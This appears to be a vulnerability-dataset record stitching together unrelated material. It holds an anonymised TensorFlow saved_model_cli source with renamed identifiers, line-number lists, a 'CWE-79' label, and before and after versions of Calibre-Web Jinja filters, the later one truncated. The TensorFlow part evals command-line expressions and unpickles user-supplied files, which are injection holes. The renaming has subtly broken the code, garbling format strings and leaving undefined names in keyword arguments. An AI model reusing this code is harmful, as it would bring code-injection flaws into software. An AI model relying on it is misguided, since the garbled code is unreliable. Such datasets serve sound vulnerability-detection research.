VAR_78.run(tpu.initialize_system())
loader.load(VAR_78, VAR_3.split(','), VAR_2)
if VAR_15:
VAR_78 = local_cli_wrapper.LocalCLIDebugWrapperSession(VAR_78)
VAR_67 = VAR_78.run(VAR_39, feed_dict=VAR_37)
for i, output in enumerate(VAR_67):
VAR_79 = VAR_38[i]
print('Result for output key %VAR_28:\n%s' % (VAR_79, output))
if VAR_11:
if not os.path.isdir(VAR_11):
os.makedirs(VAR_11)
VAR_80 = os.path.join(VAR_11, VAR_79 + '.npy')
if not VAR_12 and os.path.exists(VAR_80):
raise RuntimeError(
'Output file %VAR_28 already exists. Add \"--overwrite\" to overwrite'
' the existing output files.' % VAR_80)
np.save(VAR_80, output)
print('Output %VAR_28 is saved to %s' % (VAR_79,
VAR_80))
def FUNC_13(VAR_16):
VAR_40 = {}
VAR_41 = VAR_16.split(';')
for input_raw in filter(bool, VAR_41): # skip empty strings
VAR_68 = re.match(r'([^=]+)=([^\[\]]+)\[([^\[\]]+)\]$', input_raw)
if VAR_68:
VAR_40[VAR_68.group(1)] = VAR_68.group(2), VAR_68.group(3)
else:
VAR_68 = re.match(r'([^=]+)=([^\[\]]+)$', input_raw)
if VAR_68:
VAR_40[VAR_68.group(1)] = VAR_68.group(2), None
else:
raise RuntimeError(
'--VAR_44 "%s" format is incorrect. Please follow'
'"<VAR_69>=<filename>", or'
'"<VAR_69>=<filename>[<variable_name>]"' % input_raw)
return VAR_40
def FUNC_14(VAR_17, VAR_18=True):
VAR_40 = {}
for input_raw in filter(bool, VAR_17.split(';')):
if '=' not in VAR_17:
raise RuntimeError('--VAR_45 "%s" format is incorrect. Please follow'
'"<VAR_69>=<python expression>"' % VAR_17)
VAR_69, VAR_70 = input_raw.split('=', 1)
if VAR_18:
try:
VAR_40[VAR_69] = ast.literal_eval(VAR_70)
except:
raise RuntimeError(
f'Expression "{VAR_70}" is not a valid python literal.')
else:
VAR_40[VAR_69] = eval(VAR_70) # pylint: disable=eval-used
return VAR_40
def FUNC_15(VAR_19):
VAR_40 = FUNC_14(VAR_19)
for VAR_69, example_list in VAR_40.items():
if not isinstance(example_list, list):
raise ValueError(
'tf.Example input must be a list of dictionaries, but "%s" is %s' %
(example_list, type(example_list)))
VAR_40[VAR_69] = [
FUNC_16(VAR_42) for VAR_42 in example_list
]
return VAR_40
def FUNC_16(VAR_20):
VAR_42 = example_pb2.Example()
for feature_name, feature_list in VAR_20.items():
if not isinstance(feature_list, list):
raise ValueError('feature VAR_32 must be a list, but %VAR_28: "%s" is %s' %
(feature_name, feature_list, type(feature_list)))
if isinstance(feature_list[0], float):
VAR_42.features.feature[feature_name].float_list.value.extend(
feature_list)
elif isinstance(feature_list[0], str):
VAR_42.features.feature[feature_name].bytes_list.value.extend(
[f.encode('utf8') for f in feature_list])
elif isinstance(feature_list[0], bytes):
VAR_42.features.feature[feature_name].bytes_list.value.extend(
feature_list)
elif isinstance(feature_list[0], six.integer_types):
VAR_42.features.feature[feature_name].int64_list.value.extend(
feature_list)
else:
raise ValueError(
'Type %VAR_28 for VAR_32 %VAR_28 is not supported for tf.train.Feature.' %
(type(feature_list[0]), feature_list[0]))
return VAR_42.SerializeToString()
def FUNC_17(VAR_16, VAR_17,
VAR_19):
VAR_43 = {}
VAR_44 = FUNC_13(VAR_16)
VAR_45 = FUNC_14(VAR_17, VAR_18=False)
VAR_46 = FUNC_15(VAR_19)
for VAR_72, (filename, variable_name) in VAR_44.items():
VAR_71 = np.load(file_io.FileIO(filename, mode='rb'), allow_pickle=True) # pylint: disable=unexpected-keyword-arg
if variable_name:
if isinstance(VAR_71, np.ndarray):
logging.warn(
'Input file %VAR_28 contains a single ndarray. Name key \"%VAR_28\" ignored.'
% (filename, variable_name))
VAR_43[VAR_72] = VAR_71
else:
if variable_name in VAR_71:
VAR_43[VAR_72] = VAR_71[variable_name]
else:
raise RuntimeError(
'Input file %VAR_28 does not contain variable with name \"%VAR_28\".' %
(filename, variable_name))
else:
if isinstance(VAR_71, np.lib.npyio.NpzFile):
VAR_81 = VAR_71.files
if len(VAR_81) != 1:
raise RuntimeError(
'Input file %VAR_28 contains more than one ndarrays. Please specify '
'the name of ndarray to use.' % filename)
VAR_43[VAR_72] = VAR_71[VAR_81[0]]
else:
VAR_43[VAR_72] = VAR_71
for VAR_72, py_expr_evaluated in VAR_45.items():
if VAR_72 in VAR_43:
logging.warn(
'input_key %VAR_28 has been specified with both --VAR_44 and --input_exprs'
' options. Value in --VAR_45 will be used.' % VAR_72)
VAR_43[VAR_72] = py_expr_evaluated
for VAR_72, VAR_42 in VAR_46.items():
if VAR_72 in VAR_43:
logging.warn(
'input_key %VAR_28 has been specified in multiple options. Value in '
'--VAR_46 will be used.' % VAR_72)
VAR_43[VAR_72] = VAR_42
return VAR_43
def FUNC_18(VAR_21):
if VAR_21.all:
FUNC_8(VAR_21.dir)
else:
if VAR_21.tag_set is None:
FUNC_0(VAR_21.dir)
else:
if VAR_21.signature_def is None:
FUNC_1(VAR_21.dir, VAR_21.tag_set)
else:
FUNC_4(VAR_21.dir, VAR_21.tag_set, VAR_21.signature_def)
def FUNC_19(VAR_21):
if not VAR_21.inputs and not VAR_21.input_exprs and not VAR_21.input_examples:
raise AttributeError(
'At least one of --VAR_44, --VAR_45 or --VAR_46 must be '
'required')
VAR_43 = FUNC_17(
VAR_21.inputs, VAR_21.input_exprs, VAR_21.input_examples)
FUNC_12(VAR_21.dir, VAR_21.tag_set, VAR_21.signature_def,
VAR_43, VAR_21.outdir,
VAR_21.overwrite, VAR_13=VAR_21.worker,
VAR_14=VAR_21.init_tpu, VAR_15=VAR_21.tf_debug)
def FUNC_20(VAR_21):
if VAR_21.tag_set:
FUNC_11(
saved_model_utils.get_meta_graph_def(VAR_21.dir, VAR_21.tag_set))
else:
VAR_73 = saved_model_utils.read_saved_model(VAR_21.dir)
for VAR_4 in VAR_73.meta_graphs:
FUNC_11(VAR_4)
def FUNC_21(VAR_21):
from tensorflow.python.compiler.tensorrt import trt_convert as trt # pylint: disable=g-import-not-at-top
if not VAR_21.convert_tf1_model:
VAR_74 = trt.DEFAULT_TRT_CONVERSION_PARAMS._replace(
max_workspace_size_bytes=VAR_21.max_workspace_size_bytes,
precision_mode=VAR_21.precision_mode,
minimum_segment_size=VAR_21.minimum_segment_size)
VAR_75 = trt.TrtGraphConverterV2(
input_saved_model_dir=VAR_21.dir,
input_saved_model_tags=VAR_21.tag_set.split(','),
conversion_params=VAR_74)
try:
VAR_75.convert()
except Exception as e:
raise RuntimeError(
'{}. Try passing "--convert_tf1_model=True".'.format(e))
VAR_75.save(output_saved_model_dir=VAR_21.output_dir)
else:
trt.create_inference_graph(
None,
None,
max_batch_size=1,
max_workspace_size_bytes=VAR_21.max_workspace_size_bytes,
precision_mode=VAR_21.precision_mode,
minimum_segment_size=VAR_21.minimum_segment_size,
is_dynamic_op=True,
input_saved_model_dir=VAR_21.dir,
input_saved_model_tags=VAR_21.tag_set.split(','),
output_saved_model_dir=VAR_21.output_dir)
def FUNC_22(VAR_21):
VAR_47 = (
VAR_21.checkpoint_path
or os.path.join(VAR_21.dir, 'variables/variables'))
if not VAR_21.variables_to_feed:
VAR_76 = []
elif VAR_21.variables_to_feed.lower() == 'all':
VAR_76 = None # We will identify them after.
else:
VAR_76 = VAR_21.variables_to_feed.split(',')
saved_model_aot_compile.aot_compile_cpu_meta_graph_def(
VAR_47=checkpoint_path,
VAR_4=saved_model_utils.get_meta_graph_def(
VAR_21.dir, VAR_21.tag_set),
VAR_5=VAR_21.signature_def_key,
VAR_76=variables_to_feed,
output_prefix=VAR_21.output_prefix,
target_triple=VAR_21.target_triple,
target_cpu=VAR_21.target_cpu,
cpp_class=VAR_21.cpp_class,
multithreading=VAR_21.multithreading.lower() not in ('f', 'false', '0'))
def FUNC_23(VAR_22):
VAR_48 = (
'Usage examples:\n'
'To FUNC_18 all tag-sets in a SavedModel:\n'
'$saved_model_cli FUNC_18 --dir /tmp/VAR_73\n\n'
'To FUNC_18 all available SignatureDef keys in a '
'MetaGraphDef specified by its tag-set:\n'
'$saved_model_cli FUNC_18 --dir /tmp/VAR_73 --VAR_3 serve\n\n'
'For a MetaGraphDef with multiple tags in the tag-set, all tags must be '
'passed in, separated by \';\':\n'
'$saved_model_cli FUNC_18 --dir /tmp/VAR_73 --VAR_3 serve,gpu\n\n'
'To FUNC_18 all VAR_44 and VAR_67 TensorInfo for a specific'
' SignatureDef specified by the SignatureDef key in a'
' MetaGraph.\n'
'$saved_model_cli FUNC_18 --dir /tmp/VAR_73 --VAR_3 serve'
' --signature_def serving_default\n\n'
'To FUNC_18 all available information in the SavedModel:\n'
'$saved_model_cli FUNC_18 --dir /tmp/VAR_73 --all')
VAR_49 = VAR_22.add_parser(
'show',
description=VAR_48,
formatter_class=argparse.RawTextHelpFormatter)
VAR_49.add_argument(
'--dir',
type=str,
required=True,
help='directory containing the SavedModel to inspect')
VAR_49.add_argument(
'--all',
action='store_true',
help='if set, will output all information in given SavedModel')
VAR_49.add_argument(
'--tag_set',
type=str,
default=None,
help='tag-set of graph in SavedModel to FUNC_18, separated by \',\'')
VAR_49.add_argument(
'--signature_def',
type=str,
default=None,
metavar='SIGNATURE_DEF_KEY',
help='key of SignatureDef to display input(VAR_28) and output(VAR_28) for')
VAR_49.set_defaults(func=FUNC_18)
def FUNC_24(VAR_22):
VAR_50 = ('Usage VAR_42:\n'
'To FUNC_19 input tensors from files through a MetaGraphDef and save'
' the output tensors to files:\n'
'$saved_model_cli FUNC_18 --dir /tmp/VAR_73 --VAR_3 serve \\\n'
' --signature_def serving_default \\\n'
' --VAR_44 input1_key=/tmp/124.npz[x],input2_key=/tmp/123.npy '
'\\\n'
' --VAR_45 \'input3_key=np.ones(2)\' \\\n'
' --VAR_46 '
'\'input4_key=[{"id":[26],"weights":[0.5, 0.5]}]\' \\\n'
' --VAR_11=/out\n\n'
'For more information about input file format, please see:\n'
'https://www.tensorflow.org/guide/saved_model_cli\n')
VAR_51 = VAR_22.add_parser(
'run', description=VAR_50, formatter_class=argparse.RawTextHelpFormatter)
VAR_51.add_argument(
'--dir',
type=str,
required=True,
help='directory containing the SavedModel to execute')
VAR_51.add_argument(
'--tag_set',
type=str,
required=True,
help='tag-set of graph in SavedModel to load, separated by \',\'')
VAR_51.add_argument(
'--signature_def',
type=str,
required=True,
metavar='SIGNATURE_DEF_KEY',
help='key of SignatureDef to run')
VAR_52 = ('Loading VAR_44 from files, in the format of \'<VAR_69>=<filename>,'
' or \'<VAR_69>=<filename>[<variable_name>]\', separated by \';\'.'
' The file format can only be from .npy, .npz or pickle.')
VAR_51.add_argument('--inputs', type=str, default='', help=VAR_52)
VAR_52 = ('Specifying VAR_44 by python expressions, in the format of'
' "<VAR_69>=\'<python expression>\'", separated by \';\'. '
'numpy module is available as \'np\'. Please note that the expression '
'will be evaluated as-is, and is susceptible to code injection. '
'When this is set, the VAR_32 will override duplicate input keys from '
'--VAR_44 option.')
VAR_51.add_argument('--input_exprs', type=str, default='', help=VAR_52)
VAR_52 = (
'Specifying tf.Example VAR_44 as list of dictionaries. For VAR_42: '
'<VAR_69>=[{feature0:value_list,feature1:value_list}]. Use ";" to '
'separate input keys. Will override duplicate input keys from --VAR_44 '
'and --VAR_45 option.')
VAR_51.add_argument('--input_examples', type=str, default='', help=VAR_52)
VAR_51.add_argument(
'--outdir',
type=str,
default=None,
help='if specified, output tensor(VAR_28) will be saved to given directory')
VAR_51.add_argument(
'--overwrite',
action='store_true',
help='if set, output file will be overwritten if it already exists.')
VAR_51.add_argument(
'--tf_debug',
action='store_true',
help='if set, will use TensorFlow Debugger (tfdbg) to watch the '
'intermediate Tensors and runtime GraphDefs while running the '
'SavedModel.')
VAR_51.add_argument(
'--worker',
type=str,
default=None,
help='if specified, a Session will be FUNC_19 on the VAR_13. '
'Valid VAR_13 specification is a bns or gRPC path.')
VAR_51.add_argument(
'--init_tpu',
action='store_true',
default=None,
help='if specified, tpu.initialize_system will be called on the Session. '
'This option should be only used if the VAR_13 is a TPU job.')
VAR_51.set_defaults(func=FUNC_19)
def FUNC_25(VAR_22):
VAR_53 = ('Usage VAR_42:\n'
'To FUNC_20 for denylisted ops in SavedModel:\n'
'$saved_model_cli FUNC_20 --dir /tmp/VAR_73\n'
'To FUNC_20 a specific MetaGraph, pass in --VAR_3\n')
VAR_54 = VAR_22.add_parser(
'scan',
description=VAR_53,
formatter_class=argparse.RawTextHelpFormatter)
VAR_54.add_argument(
'--dir',
type=str,
required=True,
help='directory containing the SavedModel to execute')
VAR_54.add_argument(
'--tag_set',
type=str,
help='tag-set of graph in SavedModel to FUNC_20, separated by \',\'')
VAR_54.set_defaults(func=FUNC_20)
def FUNC_26(VAR_22):
VAR_55 = ('Usage VAR_42:\n'
'To convert the SavedModel to one that have TensorRT ops:\n'
'$saved_model_cli convert \\\n'
' --dir /tmp/VAR_73 \\\n'
' --VAR_3 serve \\\n'
' --output_dir /tmp/saved_model_trt \\\n'
' tensorrt \n')
VAR_56 = VAR_22.add_parser(
'convert',
description=VAR_55,
formatter_class=argparse.RawTextHelpFormatter)
VAR_56.add_argument(
'--dir',
type=str,
required=True,
help='directory containing the SavedModel to convert')
VAR_56.add_argument(
'--output_dir',
type=str,
required=True,
help='output directory for the converted SavedModel')
VAR_56.add_argument(
'--tag_set',
type=str,
required=True,
help='tag-set of graph in SavedModel to convert, separated by \',\'')
VAR_57 = VAR_56.add_subparsers(
title='conversion methods',
description='valid conversion methods',
help='the conversion to FUNC_19 with the SavedModel')
VAR_58 = VAR_57.add_parser(
'tensorrt',
description='Convert the SavedModel with Tensorflow-TensorRT integration',
formatter_class=argparse.RawTextHelpFormatter)
VAR_58.add_argument(
'--max_workspace_size_bytes',
type=int,
default=2 << 20,
help=('the maximum GPU temporary memory which the TRT engine can use at '
'execution time'))
VAR_58.add_argument(
'--precision_mode',
type=str,
default='FP32',
help='one of FP32, FP16 and INT8')
VAR_58.add_argument(
'--minimum_segment_size',
type=int,
default=3,
help=('the minimum number of nodes required for a subgraph to be replaced'
'in a TensorRT node'))
VAR_58.add_argument(
'--convert_tf1_model',
type=bool,
default=False,
help='support TRT conversion for TF1 models')
VAR_58.set_defaults(func=FUNC_21)
def FUNC_27(VAR_22):
VAR_59 = '\n'.join(
['Usage VAR_42:',
'To compile a SavedModel signature via (CPU) XLA AOT:',
'$saved_model_cli FUNC_22 \\',
' --dir /tmp/VAR_73 \\',
' --VAR_3 serve \\',
' --output_dir /tmp/saved_model_xla_aot',
'', '',
'Note: Additional XLA compilation options are available by setting the ',
'XLA_FLAGS environment variable. See the XLA debug options flags for ',
'all the options: ',
' {}'.format(VAR_0),
'',
'For VAR_42, to disable XLA fast math when compiling:',
'',
'XLA_FLAGS="--xla_cpu_enable_fast_math=false" $saved_model_cli '
'aot_compile_cpu ...',
'',
'Some possibly useful flags:',
' --xla_cpu_enable_fast_math=false',
' --xla_force_host_platform_device_count=<num threads>',
' (useful in conjunction with disabling multi threading)'
])
VAR_60 = VAR_22.add_parser(
'aot_compile_cpu',
description=VAR_59,
formatter_class=argparse.RawTextHelpFormatter)
VAR_60.add_argument(
'--dir',
type=str,
required=True,
help='directory containing the SavedModel to convert')
VAR_60.add_argument(
'--output_prefix',
type=str,
required=True,
help=('output directory + filename prefix for the resulting header(VAR_28) '
'and object file(VAR_28)'))
VAR_60.add_argument(
'--tag_set',
type=str,
required=True,
help='tag-set of graph in SavedModel to convert, separated by \',\'')
VAR_60.add_argument(
'--signature_def_key',
type=str,
default=signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY,
help=('signature_def key to use. '
'default: DEFAULT_SERVING_SIGNATURE_DEF_KEY'))
VAR_60.add_argument(
'--target_triple',
type=str,
default='x86_64-pc-linux',
help=('Target triple for LLVM during AOT compilation. Examples: '
'x86_64-none-darwin, x86_64-apple-ios, arm64-none-ios, '
'armv7-none-android. More examples are available in tfcompile.bzl '
'in the tensorflow codebase.'))
VAR_60.add_argument(
'--target_cpu',
type=str,
default='',
help=('Target cpu name for LLVM during AOT compilation. Examples: '
'x86_64, skylake, haswell, westmere, <empty> (unknown). For '
'a complete list of options, FUNC_19 (for x86 targets): '
'`llc -march=x86 -mcpu=help`'))
VAR_60.add_argument(
'--checkpoint_path',
type=str,
default=None,
help='Custom checkpoint to use (default: use the SavedModel variables)')
VAR_60.add_argument(
'--cpp_class',
type=str,
required=True,
help=('The name of the generated C++ class, wrapping the generated '
'function. The syntax of this flag is '
'[[<optional_namespace>::],...]<class_name>. This mirrors the '
'C++ syntax for referring to a class, where multiple namespaces '
'may precede the class name, separated by double-colons. '
'The class will be generated in the given namespace(VAR_28), or if no '
'namespaces are given, within the global namespace.'))
VAR_60.add_argument(
'--variables_to_feed',
type=str,
default='',
help=('The names of variables that will be fed into the network. '
'Options are: empty (default; all variables are frozen, none may '
'be fed), \'all\' (all variables may be fed), or a '
'comma-delimited list of names of variables that may be fed. In '
'the last case, the non-fed variables will be frozen in the graph.'
'**NOTE** Any variables passed to `VAR_76` *must be set '
'by the user*. These variables will NOT be frozen and their '
'values will be uninitialized in the compiled object '
'(this applies to all input VAR_7 from the signature as '
'well).'))
VAR_60.add_argument(
'--multithreading',
type=str,
default='False',
help=('Enable multithreading in the compiled computation. '
'Note that if using this option, the resulting object files '
'may have external dependencies on multithreading libraries '
'like nsync.'))
VAR_60.set_defaults(func=FUNC_22)
def FUNC_28():
VAR_61 = argparse.ArgumentParser(
description='saved_model_cli: Command-line interface for SavedModel')
VAR_61.add_argument('-v', '--version', action='version', version='0.1.0')
VAR_22 = VAR_61.add_subparsers(
title='commands', description='valid commands', help='additional help')
FUNC_23(VAR_22)
FUNC_24(VAR_22)
FUNC_25(VAR_22)
FUNC_26(VAR_22)
FUNC_27(VAR_22)
return VAR_61
def FUNC_29():
logging.set_verbosity(logging.INFO)
VAR_61 = FUNC_28()
VAR_21 = VAR_61.parse_args()
if not hasattr(VAR_21, 'func'):
VAR_61.error('too few arguments')
VAR_21.func(VAR_21)
if __name__ == '__main__':
sys.exit(FUNC_29())
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
16,
19,
21,
26,
30,
50,
51,
55,
56,
57,
59,
60,
63,
65,
73,
74,
77,
80,
92,
93,
97,
100,
105,
108,
117,
118,
122,
125,
130,
135,
136,
139,
142,
156,
160,
165,
171,
174,
175,
178,
184,
191,
211,
212,
220,
221,
224,
232,
236,
239,
263,
264,
267,
275,
279,
288,
289,
292,
295,
303,
311,
312,
315,
318,
324,
328,
333,
334,
337,
340,
346,
352,
353,
356,
359,
367,
374,
375,
381,
385,
404,
410,
413,
414,
415,
418,
419,
426,
431,
434,
440,
444,
445,
447,
449,
452,
454,
458,
459,
461,
465,
466,
471,
475,
476,
479,
487,
495,
498,
505,
507,
511,
520,
522,
523,
526,
529,
534,
537,
542,
548,
551,
552,
555,
559,
566,
569,
583,
584,
609,
610,
614,
619,
649,
652,
660,
664,
667,
668,
670,
683,
685,
695,
696,
703,
704,
712,
713,
716,
720,
724,
725,
726,
734,
735,
738,
741,
756,
757,
760,
771,
772,
775,
779,
780,
782,
810,
811,
814,
827,
839,
840,
885,
886,
963,
964,
985,
986,
1046,
1047,
1073,
1154,
1156,
1157,
1160,
1167,
1170,
1171,
1173,
1174,
1176,
1177,
1179,
1180,
1182,
1183,
1185,
1187,
1188,
1196,
1197,
1200,
15,
16,
17,
18,
19,
20,
62,
63,
64,
65,
66,
67,
68,
76,
77,
78,
79,
80,
81,
82,
83,
84,
85,
86,
96,
97,
98,
99,
100,
101,
102,
103,
104,
105,
106,
107,
108,
109,
110,
111,
121,
122,
123,
124,
125,
126,
127,
128,
129,
130,
131,
132,
133,
138,
139,
140,
141,
142,
143,
144,
145,
146,
147,
148,
149,
177,
178,
179,
180,
181,
223,
224,
225,
226,
227,
228,
229,
230,
266,
267,
268,
269,
270,
271,
291,
292,
293,
294,
295,
296,
297,
298,
314,
315,
316,
317,
318,
319,
320,
321,
322,
323,
324,
325,
326,
327,
328,
329,
330,
331,
336,
337,
338,
339,
340,
341,
342,
343,
344,
345,
346,
347,
348,
349,
355,
356,
357,
358,
359,
360,
361,
362,
380,
381,
382,
383,
384,
385,
386,
387,
388,
389,
390,
391,
392,
393,
394,
395,
396,
397,
398,
399,
400,
401,
402,
403,
404,
405,
406,
407,
408,
409,
478,
479,
480,
481,
482,
483,
484,
485,
486,
487,
488,
489,
490,
491,
492,
493,
494,
495,
496,
497,
498,
499,
500,
501,
525,
526,
527,
528,
529,
530,
531,
532,
533,
534,
535,
536,
537,
538,
539,
540,
554,
555,
556,
557,
558,
559,
560,
561,
562,
563,
564,
565,
566,
567,
568,
569,
570,
571,
572,
586,
613,
614,
615,
616,
617,
618,
619,
620,
621,
622,
623,
624,
625,
626,
627,
628,
629,
630,
631,
632,
633,
634,
635,
636,
637,
638,
639,
640,
641,
642,
643,
644,
645,
646,
647,
648,
649,
650,
651,
652,
653,
654,
655,
656,
657,
658,
715,
716,
717,
718,
719,
737,
738,
739,
740,
741,
742,
743,
744,
745,
759,
760,
761,
762,
763,
774,
775,
776,
777,
778,
813,
814,
815,
816,
817,
842,
888,
966,
988,
1049,
1159,
1160,
1161,
1162,
1163
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
16,
19,
21,
27,
31,
51,
52,
56,
57,
58,
60,
61,
64,
66,
74,
75,
78,
81,
93,
94,
98,
101,
106,
109,
118,
119,
123,
126,
131,
136,
137,
140,
143,
157,
161,
166,
172,
175,
176,
179,
185,
192,
212,
213,
221,
222,
225,
233,
237,
240,
264,
265,
268,
276,
280,
289,
290,
293,
296,
304,
312,
313,
316,
319,
325,
329,
334,
335,
338,
341,
347,
353,
354,
357,
360,
368,
375,
376,
382,
386,
405,
411,
414,
415,
416,
419,
420,
427,
432,
435,
441,
445,
446,
448,
450,
453,
455,
459,
460,
462,
466,
467,
472,
476,
477,
480,
488,
496,
499,
506,
508,
512,
521,
523,
524,
527,
530,
537,
540,
545,
558,
561,
562,
565,
569,
576,
579,
593,
594,
619,
620,
624,
629,
659,
662,
670,
674,
677,
678,
680,
693,
695,
705,
706,
713,
714,
722,
723,
726,
730,
734,
735,
736,
744,
745,
748,
751,
766,
767,
770,
781,
782,
785,
789,
790,
792,
820,
821,
824,
837,
849,
850,
895,
896,
975,
976,
997,
998,
1058,
1059,
1085,
1166,
1168,
1169,
1172,
1179,
1182,
1183,
1185,
1186,
1188,
1189,
1191,
1192,
1194,
1195,
1197,
1199,
1200,
1208,
1209,
1212,
15,
16,
17,
18,
19,
20,
63,
64,
65,
66,
67,
68,
69,
77,
78,
79,
80,
81,
82,
83,
84,
85,
86,
87,
97,
98,
99,
100,
101,
102,
103,
104,
105,
106,
107,
108,
109,
110,
111,
112,
122,
123,
124,
125,
126,
127,
128,
129,
130,
131,
132,
133,
134,
139,
140,
141,
142,
143,
144,
145,
146,
147,
148,
149,
150,
178,
179,
180,
181,
182,
224,
225,
226,
227,
228,
229,
230,
231,
267,
268,
269,
270,
271,
272,
292,
293,
294,
295,
296,
297,
298,
299,
315,
316,
317,
318,
319,
320,
321,
322,
323,
324,
325,
326,
327,
328,
329,
330,
331,
332,
337,
338,
339,
340,
341,
342,
343,
344,
345,
346,
347,
348,
349,
350,
356,
357,
358,
359,
360,
361,
362,
363,
381,
382,
383,
384,
385,
386,
387,
388,
389,
390,
391,
392,
393,
394,
395,
396,
397,
398,
399,
400,
401,
402,
403,
404,
405,
406,
407,
408,
409,
410,
479,
480,
481,
482,
483,
484,
485,
486,
487,
488,
489,
490,
491,
492,
493,
494,
495,
496,
497,
498,
499,
500,
501,
502,
526,
527,
528,
529,
530,
531,
532,
533,
534,
535,
536,
537,
538,
539,
540,
541,
542,
543,
564,
565,
566,
567,
568,
569,
570,
571,
572,
573,
574,
575,
576,
577,
578,
579,
580,
581,
582,
596,
623,
624,
625,
626,
627,
628,
629,
630,
631,
632,
633,
634,
635,
636,
637,
638,
639,
640,
641,
642,
643,
644,
645,
646,
647,
648,
649,
650,
651,
652,
653,
654,
655,
656,
657,
658,
659,
660,
661,
662,
663,
664,
665,
666,
667,
668,
725,
726,
727,
728,
729,
747,
748,
749,
750,
751,
752,
753,
754,
755,
769,
770,
771,
772,
773,
784,
785,
786,
787,
788,
823,
824,
825,
826,
827,
852,
898,
978,
1000,
1061,
1171,
1172,
1173,
1174,
1175
] |
1CWE-79
| # -*- coding: utf-8 -*-
# This file is part of the Calibre-Web (https://github.com/janeczku/calibre-web)
# Copyright (C) 2018-2019 OzzieIsaacs, cervinko, jkrehm, bodybybuddha, ok11,
# andy29485, idalin, Kyosfonica, wuqi, Kennyl, lemmsh,
# falgh1, grunjol, csitko, ytils, xybydy, trasba, vrabe,
# ruben-herold, marblepebble, JackED42, SiphonSquirrel,
# apetresc, nanu-c, mutschler
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# custom jinja filters
from __future__ import division, print_function, unicode_literals
import datetime
import mimetypes
from uuid import uuid4
from babel.dates import format_date
from flask import Blueprint, request, url_for
from flask_babel import get_locale
from flask_login import current_user
from . import logger
jinjia = Blueprint('jinjia', __name__)
log = logger.create()
# pagination links in jinja
@jinjia.app_template_filter('url_for_other_page')
def url_for_other_page(page):
args = request.view_args.copy()
args['page'] = page
for get, val in request.args.items():
args[get] = val
return url_for(request.endpoint, **args)
# shortentitles to at longest nchar, shorten longer words if necessary
@jinjia.app_template_filter('shortentitle')
def shortentitle_filter(s, nchar=20):
text = s.split()
res = "" # result
suml = 0 # overall length
for line in text:
if suml >= 60:
res += '...'
break
# if word longer than 20 chars truncate line and append '...', otherwise add whole word to result
# string, and summarize total length to stop at chars given by nchar
if len(line) > nchar:
res += line[:(nchar-3)] + '[..] '
suml += nchar+3
else:
res += line + ' '
suml += len(line) + 1
return res.strip()
@jinjia.app_template_filter('mimetype')
def mimetype_filter(val):
return mimetypes.types_map.get('.' + val, 'application/octet-stream')
@jinjia.app_template_filter('formatdate')
def formatdate_filter(val):
try:
return format_date(val, format='medium', locale=get_locale())
except AttributeError as e:
log.error('Babel error: %s, Current user locale: %s, Current User: %s', e,
current_user.locale,
current_user.name
)
return val
@jinjia.app_template_filter('formatdateinput')
def format_date_input(val):
input_date = val.isoformat().split('T', 1)[0] # Hack to support dates <1900
return '' if input_date == "0101-01-01" else input_date
@jinjia.app_template_filter('strftime')
def timestamptodate(date, fmt=None):
date = datetime.datetime.fromtimestamp(
int(date)/1000
)
native = date.replace(tzinfo=None)
if fmt:
time_format = fmt
else:
time_format = '%d %m %Y - %H:%S'
return native.strftime(time_format)
@jinjia.app_template_filter('yesno')
def yesno(value, yes, no):
return yes if value else no
@jinjia.app_template_filter('formatfloat')
def formatfloat(value, decimals=1):
value = 0 if not value else value
return ('{0:.' + str(decimals) + 'f}').format(value).rstrip('0').rstrip('.')
@jinjia.app_template_filter('formatseriesindex')
def formatseriesindex_filter(series_index):
if series_index:
try:
if int(series_index) - series_index == 0:
return int(series_index)
else:
return series_index
except ValueError:
return series_index
return 0
@jinjia.app_template_filter('uuidfilter')
def uuidfilter(var):
return uuid4()
| # -*- coding: utf-8 -*-
# This file is part of the Calibre-Web (https://github.com/janeczku/calibre-web)
# Copyright (C) 2018-2019 OzzieIsaacs, cervinko, jkrehm, bodybybuddha, ok11,
# andy29485, idalin, Kyosfonica, wuqi, Kennyl, lemmsh,
# falgh1, grunjol, csitko, ytils, xybydy, trasba, vrabe,
# ruben-herold, marblepebble, JackED42, SiphonSquirrel,
# apetresc, nanu-c, mutschler
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# custom jinja filters
from __future__ import division, print_function, unicode_literals
import datetime
import mimetypes
from uuid import uuid4
from babel.dates import format_date
from flask_babel import gettext as _
from flask import Blueprint, request, url_for
from flask_babel import get_locale
from flask_login import current_user
from markupsafe import escape
from . import logger
jinjia = Blueprint('jinjia', __name__)
log = logger.create()
# pagination links in jinja
@jinjia.app_template_filter('url_for_other_page')
def url_for_other_page(page):
args = request.view_args.copy()
args['page'] = page
for get, val in request.args.items():
args[get] = val
return url_for(request.endpoint, **args)
# shortentitles to at longest nchar, shorten longer words if necessary
@jinjia.app_template_filter('shortentitle')
def shortentitle_filter(s, nchar=20):
text = s.split()
res = "" # result
suml = 0 # overall length
for line in text:
if suml >= 60:
res += '...'
break
# if word longer than 20 chars truncate line and append '...', otherwise add whole word to result
# string, and summarize total length to stop at chars given by nchar
if len(line) > nchar:
res += line[:(nchar-3)] + '[..] '
suml += nchar+3
else:
res += line + ' '
suml += len(line) + 1
return res.strip()
@jinjia.app_template_filter('mimetype')
def mimetype_filter(val):
return mimetypes.types_map.get('.' + val, 'application/octet-stream')
@jinjia.app_template_filter('formatdate')
def formatdate_filter(val):
try:
return format_date(val, format='medium', locale=get_locale())
except AttributeError as e:
log.error('Babel error: %s, Current user locale: %s, Current User: %s', e,
current_user.locale,
current_user.name
)
return val
